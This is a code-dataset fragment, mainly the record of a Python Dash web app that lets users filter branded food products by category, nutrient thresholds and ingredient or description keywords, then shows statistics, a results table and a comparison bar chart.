checked, btn):\n print(btn, checked)\n btn.hide()\n\n\napp = QApplication(sys.argv)\n\nwindow = MainWindow()\nwindow.show()\napp.exec()\n", "sub_path": "pyside6-source/further/signals_extra_1.py", "file_name": "signals_extra_1.py", "file_ext": "py", "file_size_in_byte": 543, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "PySide6.QtWidgets.QMainWindow", "line_number": 6, "usage_type": "name"}, {"api_name": "PySide6.QtWidgets.QPushButton", "line_number": 10, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QApplication", "line_number": 23, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 23, "usage_type": "attribute"}]} +{"seq_id": "341729064", "text": "import dash_bootstrap_components as dbc\r\nimport dash_html_components as html\r\nimport dash_core_components as dcc\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash\r\nimport dash_table\r\nimport dash_daq as daq\r\nimport pandas as pd\r\nimport plotly.express as px\r\n\r\n\r\nexternal_stylesheets = [dbc.themes.BOOTSTRAP]\r\napp = dash.Dash(__name__, external_stylesheets = external_stylesheets)\r\n\r\nmodal_clicks = 0\r\n\r\ndf = pd.read_pickle('df_app.pkl')\r\n\r\ndef find_products(data_frame: pd.DataFrame, \r\n branded_food_cat: str, \r\n nutrient_prefs: list, \r\n desc_kw: str, \r\n ingred_kw: str) -> pd.DataFrame:\r\n\r\n \"\"\"This function filters out products that don't match the provided preferences\"\"\"\r\n\r\n data_frame = data_frame[data_frame.branded_food_category == branded_food_cat] # filter the food category\r\n\r\n for nutrient_condition in nutrient_prefs: # nutrient conditions are provided in a tuple format: (, , )\r\n \r\n if nutrient_condition[1] == 'max':\r\n data_frame = data_frame[data_frame['nutr_amnt'].apply(lambda x: x[nutrient_condition[0]][0] <= nutrient_condition[2] if nutrient_condition[0] in x.keys() else False)]\r\n \r\n elif nutrient_condition[1] == 'min':\r\n data_frame = data_frame[data_frame['nutr_amnt'].apply(lambda x: x[nutrient_condition[0]][0] >= nutrient_condition[2] if nutrient_condition[0] in x.keys() else False)]\r\n \r\n if desc_kw is not None: # keeping only the products that contain the provided keyword in their description\r\n data_frame = data_frame[data_frame['description'].apply(lambda x: desc_kw in x.lower() if not pd.isnull(x) else False)]\r\n\r\n if ingred_kw is not None: # keeping only the products that contain the provided keyword in their ingredients list\r\n data_frame = data_frame[data_frame['ingredients'].apply(lambda x: ingred_kw in x.lower() if not pd.isnull(x) else False)]\r\n \r\n return data_frame\r\n\r\n# Creating a dictionary with the Main Categories as keys and their lists of Sub-Categories as values\r\nall_options = {}\r\nfor i in df.MainCategory.dropna().unique():\r\n all_options[i] = [j for j in df[df.MainCategory == i]['SubCategory'].unique()]\r\n\r\n# Creating a dictionary with the Sub-Categories as keys and their lists of Categories as values\r\nall_options_sub = {}\r\nfor i in df.SubCategory.dropna().unique():\r\n all_options_sub[i] = [j for j in df[df.SubCategory == i]['branded_food_category'].unique()]\r\n\r\n# The above dictionaries are used in the callbacks of the category dropdown menus.\r\n\r\n\r\napp.layout = html.Div(\r\n [ \r\n dbc.Row( # The first row of the layout, contains the image of the logo and the header.\r\n [\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Img(src='/assets/HeaderB.png')\r\n ]\r\n ),\r\n width={'size':12, 'offset':0},\r\n )\r\n ]\r\n ),\r\n\r\n dbc.Row( # The second row of the layout contains the images of the instructions.\r\n [\r\n dbc.Col(\r\n html.Div( \r\n [\r\n html.Img(src='/assets/BannerA.jpg'),\r\n ]\r\n ),\r\n width={'size':2, 'offset':0}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Img(src='/assets/BannerB.jpg')\r\n \r\n ]\r\n ),\r\n width={'size':2, 'offset':4}\r\n )\r\n ]\r\n ),\r\n\r\n dbc.Row( #The third row contains all the inputs, plus the \"See Results\" button at the end.\r\n [\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5('Menu'),\r\n dcc.RadioItems( # Radio items input for the Main categories.\r\n id='radio_menu',\r\n options=[{'label': k, 'value': k} for k in all_options.keys()],\r\n labelStyle={'display': 'block','margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"10px\"}\r\n )\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 2, \"order\": 1, \"offset\": 0}, \r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5('Select Category'),\r\n dcc.Dropdown(\r\n id='cat_dropdown', \r\n options=[{'label': i, 'value': i} for i in df['SubCategory'].dropna().unique()]\r\n # The available options are changed after a Main Category is selected. See first callback.\r\n ),\r\n html.Br(),\r\n html.Br(),\r\n\r\n html.H5('Select Sub-Categoty'),\r\n dcc.Dropdown(\r\n id='subcat_dropdown', \r\n options=[{'label': i, 'value': i} for i in df['branded_food_category'].dropna().unique()]\r\n # The available options are changed after a Sub-Category is selected. See second callback.\r\n ),\r\n html.Br(style={'margin': '4px'})\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 2, \"order\": 2, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H5(id='table_title'),\r\n html.Table( # A table containing some statistics for the selected category. Controlled by the second callback.\r\n id='cat_stats',\r\n style={'border': '1px solid brown', 'background':'#eaeec6'}\r\n ),\r\n html.Br()\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={'size':2, 'order':3}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains three dropdown menus for nutrient preferences.\r\n [\r\n html.H5('Filter Nutrients'),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient_2', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(),\r\n\r\n dcc.Dropdown(\r\n id='dropdown_nutrient_3', \r\n options=[\r\n {'label': 'Calories', 'value': 'Energy'},\r\n {'label': 'Sugars', 'value': 'Sugars, total including NLEA'},\r\n {'label': 'Fat', 'value': 'Total lipid (fat)'},\r\n {'label': 'Protein', 'value': 'Protein'},\r\n {'label': 'Fiber', 'value': 'Fiber, total dietary'},\r\n {'label': 'Folic acid', 'value': 'Folic acid'}\r\n ]\r\n ),\r\n\r\n html.Br(style={'margin': '3px'})\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 4, \"offset\": 0},\r\n ),\r\n \r\n dbc.Col(\r\n html.Div( # Contains three min/max radio items, one for each nutrient dropdown menu.\r\n [\r\n html.H5('Method'),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br(style={'margin': '3px'}),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max_2',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br(style={'margin': '6px'}),\r\n\r\n dcc.RadioItems(\r\n id='radio_min_max_3',\r\n options=[\r\n {'label': 'Min', 'value': 'min'},\r\n {'label': 'Max', 'value': 'max'}\r\n ],\r\n value='min',\r\n labelStyle={'display': 'inline-block', 'margin-left':'20px'},\r\n inputStyle={\"margin-right\": \"5px\"}\r\n ),\r\n\r\n html.Br() \r\n\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 5, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains three numeric inputs, one for each nutrient dropdown.\r\n [\r\n html.H5('Set amounts'),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br(style={'margin': '1px'}),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount_2',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br(style={'margin': '1px'}),\r\n\r\n daq.NumericInput(\r\n id='min_max_amount_3',\r\n min=0,\r\n max=1000,\r\n size=80,\r\n value=0\r\n ),\r\n\r\n html.Br()\r\n\r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={\"size\": 1, \"order\": 6, \"offset\": 0},\r\n ),\r\n\r\n dbc.Col(\r\n html.Div( # Contains the ingredient keyword input and the description keyword input.\r\n [\r\n html.H5('Ingredient keyword'),\r\n\r\n dcc.Input(\r\n id='ingred_kw'\r\n ),\r\n\r\n html.Br(),\r\n html.Br(),\r\n html.Br(),\r\n html.Br(),\r\n\r\n html.H5('Description keyword'),\r\n\r\n dcc.Input(\r\n id='desc_kw'\r\n ),\r\n\r\n html.Br(),\r\n html.Br() \r\n ],\r\n style={'background-color':'#eaeec6'}\r\n ),\r\n width={'size':2, 'order':7}\r\n ),\r\n\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Button( \r\n id='button', \r\n n_clicks = 0,\r\n style={\r\n 'background-color': 'transparent',\r\n 'height': '218px',\r\n 'width': '175px',\r\n 'font-size': '26px'\r\n },\r\n hidden=True\r\n )\r\n ],\r\n style={'background-image': 'url(/assets/SeeResults.png)'}\r\n ),\r\n width={'size':1, 'order':8}\r\n )\r\n\r\n ],\r\n no_gutters=True, # reduces the space between the columns.\r\n align='start',\r\n ),\r\n \r\n dbc.Row( # The fourth row contains the presentation of the results: one table and one graph.\r\n [\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.Div(\r\n [\r\n html.H4('Results'), \r\n html.H6('(ordered by lowest amount of unfavourable nutrients | nutrient amounts are per 100g)')\r\n ]\r\n ),\r\n\r\n dash_table.DataTable( # The table contains all the products that match the provided preferences.\r\n id='table_data',\r\n style_cell={\r\n 'whiteSpace': 'normal',\r\n 'height': 'auto',\r\n 'textAlign': 'left', \r\n 'border': '1px solid brown'\r\n },\r\n style_header={\r\n 'backgroundColor':'#eaeec6',\r\n 'fontWeight': 'bold'\r\n },\r\n style_table={\r\n 'height':'500px', \r\n 'overflowY': 'auto'\r\n },\r\n style_cell_conditional=[\r\n {'if': {'column_id': 'Ingredients'},\r\n 'width': '35%'}\r\n ]\r\n )\r\n ]\r\n ),\r\n width={'size':6, 'offset':0}\r\n ),\r\n dbc.Col(\r\n html.Div(\r\n [\r\n html.H4('Comparison of the Top Results'),\r\n\r\n html.Br(),\r\n\r\n dcc.Graph( # The graph compares the top results.\r\n id='main_graph')\r\n ]\r\n ),\r\n width={'size':6, 'offset':0}\r\n ),\r\n\r\n dbc.Modal( # This modal pops up when there are no products that match the given preferences.\r\n [\r\n dbc.ModalHeader(\"Alert!\"),\r\n dbc.ModalBody(\"No products match the specified filters.\"),\r\n dbc.ModalFooter(\r\n dbc.Button(\"Close\", id=\"close_modal\", className=\"ml-auto\", n_clicks=0)\r\n ),\r\n ],\r\n id=\"modal\",\r\n ),\r\n ]\r\n \r\n )\r\n \r\n ],\r\n)\r\n\r\n@app.callback( # Adjusts the available options of the Sub-Category dropdown based on the selection of the Main Category.\r\n Output('cat_dropdown', 'options'),\r\n Input('radio_menu', 'value')\r\n)\r\n\r\ndef update_subcat_options(main_cat):\r\n\r\n if not pd.isnull(main_cat):\r\n\r\n return [{'label': i, 'value': i} for i in all_options[main_cat]]\r\n\r\n else:\r\n\r\n return [{'label':j, 'value':j} for j in df.SubCategory.dropna().unique()]\r\n\r\n@app.callback( # Adjusts the available options of the Category dropdown based on the selection of the Sub-Category.\r\n Output('subcat_dropdown', 'options'),\r\n Input('cat_dropdown', 'value')\r\n)\r\n\r\ndef update_subcat_options(sub_cat):\r\n\r\n if not pd.isnull(sub_cat):\r\n\r\n return [{'label': i, 'value': i} for i in all_options_sub[sub_cat]]\r\n\r\n else:\r\n\r\n return [{'label':j, 'value':j} for j in df.branded_food_category.dropna().unique()]\r\n\r\n@app.callback( # Enables the \"See Results\" button and fills the category analysis table.\r\n Output('button', 'hidden'),\r\n Output('cat_stats', 'children'),\r\n Output('table_title', 'children'),\r\n Input('subcat_dropdown', 'value')\r\n)\r\n\r\ndef enable_button(sbcat_selection):\r\n\r\n if not pd.isnull(sbcat_selection): # Means a category has been selected, therefore the button should be shown, and the table filled.\r\n\r\n # First, preparing the statistics that will be included in the table of the Category analysis.\r\n df_subcat = df.loc[(df.branded_food_category == sbcat_selection), :]\r\n\r\n df_subcat.loc[:, 'Calories'] = df_subcat['nutr_amnt'].apply(lambda x: x['Energy'][0] if 'Energy' in x.keys() else 0)\r\n df_subcat.loc[:, 'Protein'] = df_subcat['nutr_amnt'].apply(lambda x: x['Protein'][0] if 'Protein' in x.keys() else 0)\r\n df_subcat.loc[:, 'Fiber'] = df_subcat['nutr_amnt'].apply(lambda x: x['Fiber, total dietary'][0] if 'Fiber, total dietary' in x.keys() else 0)\r\n df_subcat.loc[:, 'Sugars'] = df_subcat['nutr_amnt'].apply(lambda x: x['Sugars, total including NLEA'][0] if 'Sugars, total including NLEA' in x.keys() else 0)\r\n df_subcat.loc[:, 'Fat'] = df_subcat['nutr_amnt'].apply(lambda x: x['Total lipid (fat)'][0] if 'Total lipid (fat)' in x.keys() else 0)\r\n \r\n df_subcat = df_subcat[['Calories', 'Protein', 'Fiber', 'Sugars', 'Fat']]\r\n df_subcat_agg = df_subcat.agg(['mean', 'median', 'std', 'max', 'min']).round(1).reset_index().rename(columns={'index':'stat'})\r\n\r\n # Creating the children of the html.Table element.\r\n table_children = [\r\n html.Tr(\r\n [html.Th(col, style={'border': '1px solid brown'}) for col in df_subcat_agg.columns]\r\n )\r\n ] \r\n table_children.extend(\r\n [\r\n html.Tr(\r\n [html.Td(df_subcat_agg.iloc[i][col], style={'border': '1px solid brown'}) for col in df_subcat_agg.columns]\r\n ) for i in range(len(df_subcat_agg))\r\n ]\r\n )\r\n\r\n return False, table_children, sbcat_selection\r\n\r\n else: # Means a category has not been selected yet, therefore the button should be hidden. The table is filled with zeros.\r\n empty_table = df.loc[:2, :]\r\n\r\n empty_table.loc[:, 'Calories'] = empty_table['nutr_amnt'].apply(lambda x: x['Energy'][0] if 'Energy' in x.keys() else 0)\r\n empty_table.loc[:, 'Protein'] = empty_table['nutr_amnt'].apply(lambda x: x['Protein'][0] if 'Protein' in x.keys() else 0)\r\n empty_table.loc[:, 'Fiber'] = empty_table['nutr_amnt'].apply(lambda x: x['Fiber, total dietary'][0] if 'Fiber, total dietary' in x.keys() else 0)\r\n empty_table.loc[:, 'Sugars'] = empty_table['nutr_amnt'].apply(lambda x: x['Sugars, total including NLEA'][0] if 'Sugars, total including NLEA' in x.keys() else 0)\r\n empty_table.loc[:, 'Fat'] = empty_table['nutr_amnt'].apply(lambda x: x['Total lipid (fat)'][0] if 'Total lipid (fat)' in x.keys() else 0)\r\n\r\n empty_table = empty_table.loc[:,['Calories', 'Protein', 'Fiber', 'Sugars', 'Fat']]\r\n empty_table = empty_table.agg(['mean', 'median', 'std', 'max', 'min']).round().reset_index().rename(columns={'index':'stat'})\r\n\r\n empty_table_children= [\r\n html.Tr(\r\n [html.Th(col, style={'border': '1px solid brown'}) for col in empty_table.columns]\r\n )\r\n ] \r\n empty_table_children.extend(\r\n [\r\n html.Tr(\r\n [html.Td(0, style={'border': '1px solid brown'}) for col in empty_table.columns]\r\n ) for i in range(len(empty_table))\r\n ]\r\n )\r\n\r\n return True, empty_table_children, 'Category Analysis'\r\n\r\n@app.callback( # Main callback, controls the results table, the graph and the modal. It's activated when the \"See Results\" button is clicked.\r\n Output('table_data', 'data'),\r\n Output('table_data', 'columns'),\r\n Output('main_graph', 'figure'),\r\n Output('modal', 'is_open'),\r\n [Input('button', 'n_clicks'), Input('close_modal', 'n_clicks')],\r\n [\r\n State('subcat_dropdown', 'value'),\r\n State('dropdown_nutrient', 'value'),\r\n State('dropdown_nutrient_2', 'value'),\r\n State('dropdown_nutrient_3', 'value'),\r\n State('radio_min_max', 'value'),\r\n State('radio_min_max_2', 'value'),\r\n State('radio_min_max_3', 'value'),\r\n State('min_max_amount', 'value'),\r\n State('min_max_amount_2', 'value'),\r\n State('min_max_amount_3', 'value'),\r\n State('ingred_kw', 'value'),\r\n State('desc_kw', 'value')\r\n ]\r\n)\r\n\r\ndef update_table(n_clicks, n_clicks_close_modal, category, nutr1, nutr2, nutr3, min_max1, min_max2, min_max3, amnt1, amnt2, amnt3, ingred_kw, desc_kw):\r\n \r\n cols = ['description', 'ingredients', 'brand_owner', 'calories', 'sugars', 'fat', 'protein', 'fiber', 'folic_acid', 'bad_nutrients']\r\n formal_cols = ['Description', 'Ingredients', 'Company', 'Calories (kcal)', 'Sugars (g)',\r\n 'Fat (g)', 'Protein (g)', 'Fiber (g)', 'Folic acid (μg)', 'Unfavourable nutrients']\r\n\r\n if n_clicks != 0: # The button is clicked.\r\n\r\n # The following if statements check how many of the three nutrient preference inputs have been filled.\r\n # If the second is filled, then the third is checked. If the third is not filled, only the first two are considered.\r\n # If the second is not filled, then the first is checked. If neither the first is filled, no nutrient preferences are considered.\r\n # The trys and excepts are used to catch errors of processing an empty dataframe in case of no matching products.\r\n\r\n if not pd.isnull(nutr2):\r\n \r\n if not pd.isnull(nutr3): # All three are filled.\r\n test = find_products(\r\n data_frame=df, \r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1), (nutr2, min_max2, amnt2), (nutr3, min_max3, amnt3)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n else: # First and second are filled.\r\n\r\n test = find_products(\r\n data_frame=df,\r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1), (nutr2, min_max2, amnt2)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n elif not pd.isnull(nutr1): # Only the first is filled.\r\n\r\n test = find_products(\r\n data_frame=df, \r\n branded_food_cat = category, \r\n nutrient_prefs=[(nutr1, min_max1, amnt1)],\r\n desc_kw=desc_kw,\r\n ingred_kw=ingred_kw)\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass\r\n\r\n else:\r\n\r\n test = df[df.branded_food_category == category]\r\n\r\n try:\r\n test = test[cols]\r\n test = test.rename(columns=dict(zip(cols, formal_cols))).sort_values(by='Unfavourable nutrients', ascending=True)\r\n\r\n\r\n data = test.to_dict('records')\r\n columns = [{\"name\": i, \"id\": i} for i in test.columns]\r\n\r\n except:\r\n pass \r\n\r\n if not len(test) > 0: # No matching products. Modal must pop up.\r\n\r\n modal_open = True\r\n\r\n global modal_clicks\r\n\r\n if n_clicks_close_modal > modal_clicks: # Making the \"close\" button of the modal functional.\r\n\r\n modal_open = False\r\n modal_clicks += 1\r\n\r\n return data, columns, {}, modal_open\r\n\r\n n_products = min(5, len(test)) # Comparing 5 products at most.\r\n avg_cat = df.groupby('branded_food_category')[['calories', 'protein', 'fiber', 'sugars', 'fat', 'folic_acid']].mean()\r\n\r\n # Creating a dictionary that will serve as the source of the visualization dataframe.\r\n # The 'names' control are prepared in such a way as to be suitable for the plot legend.\r\n d = {'names': [f'{i}. ' + name + ' - ' + brand for i, name, brand in zip(range(1, n_products+1), test.Description.fillna('-').values[:n_products], test.Company.fillna('-').values[:n_products])] + [category + ' average'],\r\n 'Calories (kcal)': [calorie for calorie in test['Calories (kcal)'].values[:n_products]] + [avg_cat.loc[category, :].calories],\r\n 'Protein (g)': [prot for prot in test['Protein (g)'].values[:n_products]] + [avg_cat.loc[category, :].protein],\r\n 'Fiber (g)': [fiber for fiber in test['Fiber (g)'].values[:n_products]] + [avg_cat.loc[category, :].fiber],\r\n 'Sugars (g)': [sugar for sugar in test['Sugars (g)'].values[:n_products]] + [avg_cat.loc[category, :].sugars],\r\n 'Fat (g)' : [fat for fat in test['Fat (g)'].values[:n_products]] + [avg_cat.loc[category, :].fat],\r\n 'Folic acid (μg)': [folic for folic in test['Folic acid (μg)'].values[:n_products]] + [avg_cat.loc[category, :]['folic_acid']]\r\n }\r\n\r\n # Creating the visualization dataframe from the previous dictionary.\r\n # Using pd.melt() to unpivot the data and make it more suitable for the px.bar function.\r\n viz_df = pd.melt(pd.DataFrame(d), id_vars='names', value_vars=['Calories (kcal)', 'Protein (g)', 'Fiber (g)', 'Sugars (g)', 'Fat (g)', 'Folic acid (μg)'])\r\n col_seq = ['#333131', '#615F5F', '#878686', '#A29F9F', '#C4C2C2', '#FF6666'] # Color sequences of the barplot.\r\n\r\n fig = px.bar(data_frame= viz_df, x='names', y='value', facet_col='variable', \r\n color='names', labels={'names':'', 'value':''}, \r\n #title= 'Product Comparison' + ' - ' ,\r\n facet_col_spacing=0.05, height=600,\r\n facet_col_wrap=3, facet_row_spacing=0.15, color_discrete_sequence=col_seq[:n_products]+[col_seq[-1]])\r\n\r\n fig.update_yaxes(matches=None, showticklabels=True)\r\n fig.update_xaxes(showticklabels=False)\r\n fig.update_layout(legend = dict(yanchor='top', y=1.1+n_products/7, xanchor='left', x=0))\r\n fig.for_each_annotation(lambda a: a.update(text=a.text.replace(\"variable=\", \"\")))\r\n\r\n modal_open = False \r\n\r\n return data, columns, fig, modal_open\r\n\r\n else: # The initial state of the table and the graph. When the app opens, they are both empty.\r\n\r\n empty_cols = [{\"name\": i, \"id\": i} for i in df[cols].rename(columns=dict(zip(cols, formal_cols))).columns]\r\n d = [dict(zip(formal_cols, ['' for i in range(len(formal_cols))]))]\r\n\r\n return d, empty_cols, {}, False\r\n\r\nif __name__ == \"__main__\":\r\n app.run_server(debug=True)", "sub_path": "app/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 30889, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "dash_bootstrap_components.themes", "line_number": 12, "usage_type": "attribute"}, {"api_name": "dash.Dash", "line_number": 13, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 19, "usage_type": "attribute"}, {"api_name": "pandas.isnull", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.isnull", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "attribute"}, {"api_name": "dash_html_components.Div", "line_number": 58, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 60, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 63, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 64, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 66, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 74, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 76, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 77, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 79, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 85, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 86, "usage_type": "call"}, {"api_name": "dash_html_components.Img", "line_number": 88, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 97, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 99, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 100, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 102, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 103, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 115, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 116, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 118, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 119, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 124, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 125, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 127, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 128, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 133, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 141, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Table", "line_number": 144, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 155, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 156, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 158, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 160, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 172, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 174, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 186, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 188, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 200, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 207, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 208, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 210, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 212, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 223, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 225, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 236, "usage_type": "call"}, {"api_name": "dash_core_components.RadioItems", "line_number": 238, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 249, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 257, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 258, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 260, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 262, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 270, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_daq.NumericInput", "line_number": 282, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 290, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 298, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 299, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 301, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 303, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 307, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 308, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 309, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 310, "usage_type": "call"}, {"api_name": "dash_html_components.H5", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_core_components.Input", "line_number": 314, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 318, "usage_type": "call"}, {"api_name": "dash_html_components.Br", "line_number": 319, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 326, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_html_components.Button", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 351, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 353, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 354, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 356, "usage_type": 